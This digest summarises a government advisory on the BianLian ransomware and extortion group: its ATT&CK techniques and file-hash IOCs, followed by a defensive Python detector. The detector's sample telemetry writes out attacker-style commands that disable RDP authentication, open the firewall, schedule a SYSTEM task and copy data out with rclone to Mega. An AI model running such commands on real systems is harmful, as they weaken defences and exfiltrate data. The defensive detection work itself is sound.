FBI, CISA, and ACSC describe BianLian ransomware and data-extortion group IOCs and TTPs identified through investigations as of March 2023, noting a shift from double-extortion to exfiltration-based extortion. The advisory covers initial access via RDP/phishing, backdoor and remote-access use, credential theft, data exfiltration methods, ransom notes, and mitigation guidance. #BianLian #FBI
Keypoints
- BianLian is a ransomware developer/deployer and data extortion group active in U.S. critical infrastructure sectors since June 2022, with Australian targets as well.
- Initial access primarily via compromised RDP credentials or phishing, enabling foothold in victim networks.
- They deploy a custom backdoor (Go) and install remote-access tools (TeamViewer, Atera, SplashTop, AnyDesk) for persistence and C2.
- Defense evasion includes PowerShell and Windows Shell usage to disable AMSI/antivirus and registry modifications to tamper protection.
- Discovery and lateral movement leverage native Windows tools plus network scanners (Advanced Port Scanner, SoftPerfect) and domain enumeration (AD, trusts).
- Exfiltration-focused extortion with FTP, Rclone, and Mega; encryption was used previously, but from Jan 2023 the group shifted to exfiltration-only extortion.
- IOCs include specific file hashes (def.exe, encryptor.exe, exp.exe, system.exe) and ransom-note-related artifacts (Look at this instruction.txt).
MITRE Techniques
- [T1587.001] Resource Development – Develop Capabilities: Malware – BianLian group actors developed a custom backdoor used in their intrusions. “Develop Capabilities: Malware”
- [T1133] External Remote Services – BianLian group actors used RDP with valid accounts as a means of gaining initial access and for lateral movement. “External Remote Services”
- [T1566] Phishing – BianLian group actors used phishing to obtain valid user credentials for initial access. “Phishing”
- [T1078] Valid Accounts – BianLian group actors used RDP with valid accounts as a means of gaining initial access and for lateral movement. “Valid Accounts”
- [T1059.001] Command and Scripting Interpreter: PowerShell – BianLian group actors used PowerShell to disable AMSI on Windows. “PowerShell”
- [T1059.003] Command and Scripting Interpreter: Windows Command Shell – BianLian group actors used Windows Command Shell to disable antivirus tools, for discovery, and to execute tools. “Windows Command Shell”
- [T1053.005] Scheduled Task/Job: Scheduled Task – BianLian group actors used a Scheduled Task run as SYSTEM to execute a DLL daily. “Scheduled Task”
- [T1098] Account Manipulation – BianLian group actors changed the password of an account they created. “Account Manipulation”
- [T1136.001] Create Account: Local Account – BianLian group actors created/activated a local administrator account. “Create Account: Local Account”
- [T1112] Modify Registry – BianLian group actors modified the registry to disable user authentication for RDP and to disable tamper protection for AV services. “Modify Registry”
- [T1562.001] Impair Defenses: Disable or Modify Tools – BianLian group actors disabled Windows Defender/AMSI and tamper protection. “Impair Defenses: Disable or Modify Tools”
- [T1562.004] Impair Defenses: Disable or Modify System Firewall – BianLian group actors added/modified firewall rules to allow RDP traffic. “Impair Defenses: Disable or Modify System Firewall”
- [T1003.001] OS Credential Dumping: LSASS Memory – BianLian group actors accessed credential material stored in LSASS memory. “OS Credential Dumping: LSASS Memory”
- [T1003.003] OS Credential Dumping: NTDS – BianLian group actors attempted to access/copy the AD database to steal credentials. “OS Credential Dumping: NTDS”
- [T1552.001] Unsecured Credentials: Credentials In Files – BianLian group actors searched for insecurely stored credentials. “Unsecured Credentials: Credentials In Files”
- [T1087.002] Domain Account – BianLian group actors queried domain accounts in Domain Admins and Domain Computers groups. “Domain Account”
- [T1482] Domain Trust Discovery – BianLian group actors enumerated AD trusts to identify movement opportunities. “Domain Trust Discovery”
- [T1083] File and Directory Discovery – BianLian group used system.exe to enumerate files. “File and Directory Discovery”
- [T1046] Network Service Discovery – BianLian actors used port scanners to identify services/versions. “Network Service Discovery”
- [T1135] Network Share Discovery – BianLian actors used tools to enumerate network shares. “Network Share Discovery”
- [T1069.002] Permission Groups Discovery: Domain Groups – BianLian group actors identified domain groups. “Permission Groups Discovery: Domain Groups”
- [T1012] Query Registry – BianLian group used system.exe to enumerate registry. “Query Registry”
- [T1018] Remote System Discovery – BianLian group attempted to list other systems on the network. “Remote System Discovery”
- [T1021.001] Remote Services: Remote Desktop Protocol – BianLian group used RDP for lateral movement. “Remote Desktop Protocol”
- [T1115] Clipboard Data – BianLian group malware copies clipboard data. “Clipboard Data”
- [T1105] Ingress Tool Transfer – BianLian group transferred tools/files from external system. “Ingress Tool Transfer”
- [T1219] Remote Access Software – BianLian group used TeamViewer, Atera, SplashTop for interactive C2. “Remote Access Software”
- [T1537] Transfer Data to Cloud Account – BianLian group used Rclone to exfiltrate data to cloud storage. “Transfer Data to Cloud Account”
- [T1048] Exfiltration Over Alternative Protocol – BianLian group exfiltrated data via FTP. “Exfiltration Over Alternative Protocol”
- [T1567.002] Exfiltration Over Web Service: Exfiltration to Cloud Storage – BianLian group exfiltrated data via the Mega public file-sharing service. “Exfiltration Over Web Service: Exfiltration to Cloud Storage”
- [T1486] Data Encrypted for Impact – BianLian group encrypted data on target systems (historical). “Data Encrypted for Impact”
Indicators of Compromise
- [SHA-256 Hash] – def.exe – 7b15f570a23a5c5ce8ff942da60834a9d0549ea3ea9f34f900a09331325df893
- [SHA-256 Hash] – encryptor.exe – 1fd07b8d1728e416f897bef4f1471126f9b18ef108eb952f4b75050da22e8e43
- [SHA-256 Hash] – exp.exe – 0c1eb11de3a533689267ba075e49d93d55308525c04d6aff0d2c54d1f52f5500
- [SHA-256 Hash] – system.exe – 40126ae71b857dd22db39611c25d3d5dd0e60316b72830e930fba9baf23973ce
- [File name] – def.exe, encryptor.exe, exp.exe, system.exe – See Table 1 for IOCs
- [File name] – Look at this instruction.txt – ransom note file
- [URL] – https://qtox.github[.]io – Tox chat link cited in ransom note
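As an added example (not part of the advisory or this digest), the following Python maps constructed endpoint telemetry to the techniques and IOCs listed above: the four SHA-256 hashes and the ransom-note file name come from the IOC list, while the event record shape, the sample command lines and the exact command syntax in the regexes are assumptions (the registry paths are real Windows locations).

```python
import re

# SHA-256 hashes of BianLian tooling from the advisory's IOC table.
BIANLIAN_HASHES = {
    "7b15f570a23a5c5ce8ff942da60834a9d0549ea3ea9f34f900a09331325df893",  # def.exe
    "1fd07b8d1728e416f897bef4f1471126f9b18ef108eb952f4b75050da22e8e43",  # encryptor.exe
    "0c1eb11de3a533689267ba075e49d93d55308525c04d6aff0d2c54d1f52f5500",  # exp.exe
    "40126ae71b857dd22db39611c25d3d5dd0e60316b72830e930fba9baf23973ce",  # system.exe
}
RANSOM_NOTE = "look at this instruction.txt"

# Command-line patterns for behaviours the advisory attributes to the group; the exact
# command syntax is an assumption (not quoted from the advisory), matched lower-cased.
COMMAND_RULES = [
    (r"reg\s+add\b.*rdp-tcp.*userauthentication.*\b0\b", "T1112"),  # RDP NLA disabled
    (r"reg\s+add\b.*windows defender.*tamperprotection", "T1112"),  # AV tamper protection
    (r"netsh\s+advfirewall\b.*add\s+rule.*(3389|remotedesktop).*action=allow", "T1562.004"),
    (r"schtasks\b.*/create\b.*/ru\s+system\b.*/sc\s+daily\b", "T1053.005"),
    (r"(^|\\)(teamviewer|anydesk|atera|splashtop)\S*\.exe", "T1219"),
    (r"(^|\\)rclone(\.exe)?\b", "T1537"),
    (r"\bmega(cmd|sync)?\b", "T1567.002"),
]

def classify_event(event):
    """Return sorted technique IDs / IOC labels that one telemetry record matches."""
    hits = set()
    if event.get("sha256", "").lower() in BIANLIAN_HASHES:
        hits.add("IOC:known-hash")
    if event["type"] == "process":
        cmd = event.get("cmdline", "").lower()
        hits.update(t for pat, t in COMMAND_RULES if re.search(pat, cmd))
    elif event["type"] == "file":
        name = event.get("path", "").lower().rsplit("\\", 1)[-1]
        if name == RANSOM_NOTE:
            hits.add("IOC:ransom-note")
    return sorted(hits)

def triage(events):
    """Aggregate hits over a host's events: {label: [event indexes]}."""
    summary = {}
    for idx, ev in enumerate(events):
        for hit in classify_event(ev):
            summary.setdefault(hit, []).append(idx)
    return summary

# Constructed sample telemetry (not from a real incident).
SAMPLE_EVENTS = [
    {"type": "process", "cmdline": r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f'},
    {"type": "process", "cmdline": 'netsh advfirewall firewall add rule name="rdp" dir=in protocol=TCP localport=3389 action=allow'},
    {"type": "process", "cmdline": r"schtasks /create /tn Update /tr rundll32.exe C:\Windows\update.dll /ru SYSTEM /sc daily"},
    {"type": "process", "cmdline": r"C:\Temp\rclone.exe copy D:\Finance mega:exfil"},
    {"type": "file", "path": r"C:\Users\Public\Look at this instruction.txt"},
    {"type": "file", "path": r"C:\Windows\Temp\system.exe", "sha256": "40126ae71b857dd22db39611c25d3d5dd0e60316b72830e930fba9baf23973ce"},
]
```

Running `triage(SAMPLE_EVENTS)` yields one entry per matched label; a single host showing both the registry/firewall changes and a known hash or ransom note is the combination the advisory describes.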
Read more: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-136a